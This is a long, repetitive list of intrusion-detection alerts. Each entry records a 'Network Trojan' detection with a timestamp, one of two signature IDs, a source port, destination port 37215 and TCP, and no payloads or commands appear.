                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.845068
                  SID:2835222
                  Source Port:37686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.003897
                  SID:2829579
                  Source Port:43570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879293
                  SID:2835222
                  Source Port:60810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905165
                  SID:2835222
                  Source Port:39782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.382774
                  SID:2835222
                  Source Port:60506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.699441
                  SID:2835222
                  Source Port:34696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.172014
                  SID:2835222
                  Source Port:48922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.872449
                  SID:2829579
                  Source Port:50098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.878090
                  SID:2829579
                  Source Port:52006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.559919
                  SID:2835222
                  Source Port:35718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.396105
                  SID:2835222
                  Source Port:48046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.022259
                  SID:2835222
                  Source Port:41450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.855668
                  SID:2835222
                  Source Port:43242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.077258
                  SID:2835222
                  Source Port:38700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.294251
                  SID:2829579
                  Source Port:48032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.424605
                  SID:2835222
                  Source Port:34012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.901645
                  SID:2829579
                  Source Port:54730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.027883
                  SID:2835222
                  Source Port:41690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.011560
                  SID:2835222
                  Source Port:51848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.936367
                  SID:2835222
                  Source Port:35762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.330413
                  SID:2835222
                  Source Port:51320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.821123
                  SID:2835222
                  Source Port:59458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.866007
                  SID:2829579
                  Source Port:57548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.005995
                  SID:2835222
                  Source Port:37338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.156560
                  SID:2835222
                  Source Port:43244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.470099
                  SID:2835222
                  Source Port:38442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.435309
                  SID:2835222
                  Source Port:33182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.790493
                  SID:2835222
                  Source Port:32808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.823696
                  SID:2835222
                  Source Port:39758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.297607
                  SID:2829579
                  Source Port:54326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.808295
                  SID:2829579
                  Source Port:43622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.397659
                  SID:2835222
                  Source Port:39406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.791057
                  SID:2835222
                  Source Port:32822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.492414
                  SID:2829579
                  Source Port:49702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.337218
                  SID:2835222
                  Source Port:39854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.498447
                  SID:2835222
                  Source Port:34290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.329948
                  SID:2835222
                  Source Port:45168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.710237
                  SID:2835222
                  Source Port:56858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.848965
                  SID:2835222
                  Source Port:45638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927814
                  SID:2835222
                  Source Port:41434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.398868
                  SID:2829579
                  Source Port:54492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.211493
                  SID:2829579
                  Source Port:43424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.011385
                  SID:2835222
                  Source Port:58604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.655197
                  SID:2829579
                  Source Port:45924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.448133
                  SID:2835222
                  Source Port:46524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.286417
                  SID:2835222
                  Source Port:42606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.187450
                  SID:2829579
                  Source Port:33390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.322732
                  SID:2829579
                  Source Port:53116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.820338
                  SID:2829579
                  Source Port:38370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.578740
                  SID:2835222
                  Source Port:55830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.370410
                  SID:2835222
                  Source Port:40186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.915433
                  SID:2829579
                  Source Port:54512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.303289
                  SID:2835222
                  Source Port:33522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.126065
                  SID:2829579
                  Source Port:35728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.682664
                  SID:2829579
                  Source Port:54050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.767297
                  SID:2829579
                  Source Port:58494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.488674
                  SID:2835222
                  Source Port:44846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.563593
                  SID:2835222
                  Source Port:51858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.077286
                  SID:2829579
                  Source Port:44112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.211472
                  SID:2829579
                  Source Port:55898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885642
                  SID:2835222
                  Source Port:49070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.196604
                  SID:2829579
                  Source Port:55274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.859922
                  SID:2835222
                  Source Port:44510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514103
                  SID:2835222
                  Source Port:56680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.602655
                  SID:2829579
                  Source Port:45534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.901357
                  SID:2829579
                  Source Port:45262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.369932
                  SID:2829579
                  Source Port:36770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.417090
                  SID:2829579
                  Source Port:53288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.858542
                  SID:2829579
                  Source Port:36162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.832296
                  SID:2829579
                  Source Port:42872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911510
                  SID:2829579
                  Source Port:36412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926905
                  SID:2835222
                  Source Port:44496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.568128
                  SID:2829579
                  Source Port:40242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.823629
                  SID:2835222
                  Source Port:53402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833831
                  SID:2835222
                  Source Port:35872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.666585
                  SID:2829579
                  Source Port:50312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.642670
                  SID:2835222
                  Source Port:35768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.126538
                  SID:2835222
                  Source Port:51008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.207255
                  SID:2835222
                  Source Port:44908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.876445
                  SID:2835222
                  Source Port:50746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.974882
                  SID:2829579
                  Source Port:51704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.057215
                  SID:2835222
                  Source Port:46066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.832636
                  SID:2835222
                  Source Port:50596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.339943
                  SID:2829579
                  Source Port:40584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.479148
                  SID:2829579
                  Source Port:57104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.759956
                  SID:2835222
                  Source Port:53560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.808403
                  SID:2829579
                  Source Port:51896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.989466
                  SID:2835222
                  Source Port:44494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.920936
                  SID:2835222
                  Source Port:44690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373909
                  SID:2835222
                  Source Port:41180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392999
                  SID:2835222
                  Source Port:54450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.515772
                  SID:2835222
                  Source Port:37384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.755286
                  SID:2829579
                  Source Port:57190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.522435
                  SID:2835222
                  Source Port:51926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.834520
                  SID:2829579
                  Source Port:37400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.876942
                  SID:2829579
                  Source Port:33562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.207255
                  SID:2829579
                  Source Port:59146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.264063
                  SID:2829579
                  Source Port:49588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.562262
                  SID:2829579
                  Source Port:47870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383825
                  SID:2829579
                  Source Port:56872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2829579
                  Source Port:38892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.808295
                  SID:2835222
                  Source Port:51966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.798574
                  SID:2835222
                  Source Port:41716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2835222
                  Source Port:36352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.298145
                  SID:2829579
                  Source Port:60976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.841830
                  SID:2829579
                  Source Port:35528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.547774
                  SID:2829579
                  Source Port:60136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.522972
                  SID:2835222
                  Source Port:47728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985720
                  SID:2835222
                  Source Port:58840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.201608
                  SID:2829579
                  Source Port:33640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.291242
                  SID:2835222
                  Source Port:40826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.802348
                  SID:2829579
                  Source Port:49790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398717
                  SID:2835222
                  Source Port:53090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.775037
                  SID:2835222
                  Source Port:49790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761969
                  SID:2835222
                  Source Port:34706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.143862
                  SID:2829579
                  Source Port:49612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.605361
                  SID:2829579
                  Source Port:60306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.999181
                  SID:2829579
                  Source Port:58810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.373847
                  SID:2829579
                  Source Port:34124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.605487
                  SID:2835222
                  Source Port:51668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.098663
                  SID:2829579
                  Source Port:60300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.828083
                  SID:2835222
                  Source Port:53808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.566781
                  SID:2835222
                  Source Port:47938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.488012
                  SID:2835222
                  Source Port:53170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.521223
                  SID:2829579
                  Source Port:34656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.556847
                  SID:2829579
                  Source Port:52734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.095655
                  SID:2835222
                  Source Port:53654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.786182
                  SID:2829579
                  Source Port:42874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.842346
                  SID:2835222
                  Source Port:44014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.847591
                  SID:2835222
                  Source Port:33690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.997408
                  SID:2829579
                  Source Port:53742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.639847
                  SID:2835222
                  Source Port:56122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.803034
                  SID:2835222
                  Source Port:49292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.486593
                  SID:2829579
                  Source Port:50214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.205461
                  SID:2829579
                  Source Port:50832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.538160
                  SID:2835222
                  Source Port:36586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.524007
                  SID:2829579
                  Source Port:56588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.188180
                  SID:2829579
                  Source Port:59012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.217432
                  SID:2835222
                  Source Port:55758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.425119
                  SID:2829579
                  Source Port:53324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.251160
                  SID:2829579
                  Source Port:58626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.548799
                  SID:2829579
                  Source Port:48420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.233513
                  SID:2829579
                  Source Port:43140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.372115
                  SID:2829579
                  Source Port:60770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.906092
                  SID:2829579
                  Source Port:44568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.672861
                  SID:2829579
                  Source Port:40182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.787511
                  SID:2835222
                  Source Port:37108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.611228
                  SID:2835222
                  Source Port:57674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.974355
                  SID:2835222
                  Source Port:57832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.548975
                  SID:2835222
                  Source Port:54366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.888155
                  SID:2829579
                  Source Port:44276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.465194
                  SID:2835222
                  Source Port:58302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.948745
                  SID:2829579
                  Source Port:34982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011299
                  SID:2835222
                  Source Port:60888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.446439
                  SID:2829579
                  Source Port:36812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.620224
                  SID:2829579
                  Source Port:39030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.062110
                  SID:2829579
                  Source Port:36630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.437394
                  SID:2835222
                  Source Port:44426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.437596
                  SID:2835222
                  Source Port:41534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.847925
                  SID:2835222
                  Source Port:41586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.805971
                  SID:2829579
                  Source Port:46620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.151496
                  SID:2835222
                  Source Port:60594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.371884
                  SID:2835222
                  Source Port:60962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.816754
                  SID:2829579
                  Source Port:48162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.518951
                  SID:2829579
                  Source Port:52850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.961510
                  SID:2835222
                  Source Port:38580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.929759
                  SID:2835222
                  Source Port:43438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.751989
                  SID:2835222
                  Source Port:41240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.922168
                  SID:2835222
                  Source Port:47752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460013
                  SID:2835222
                  Source Port:46828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.985761
                  SID:2829579
                  Source Port:52996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.571584
                  SID:2835222
                  Source Port:34922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.682108
                  SID:2835222
                  Source Port:52918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.507738
                  SID:2835222
                  Source Port:52584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.673739
                  SID:2835222
                  Source Port:37542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900160
                  SID:2835222
                  Source Port:59736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.875965
                  SID:2835222
                  Source Port:59478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.334361
                  SID:2829579
                  Source Port:48926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.665744
                  SID:2835222
                  Source Port:55750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.646644
                  SID:2835222
                  Source Port:40186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.800250
                  SID:2835222
                  Source Port:46046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.912600
                  SID:2835222
                  Source Port:35178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.887651
                  SID:2829579
                  Source Port:52382
                  Destination Port:37215
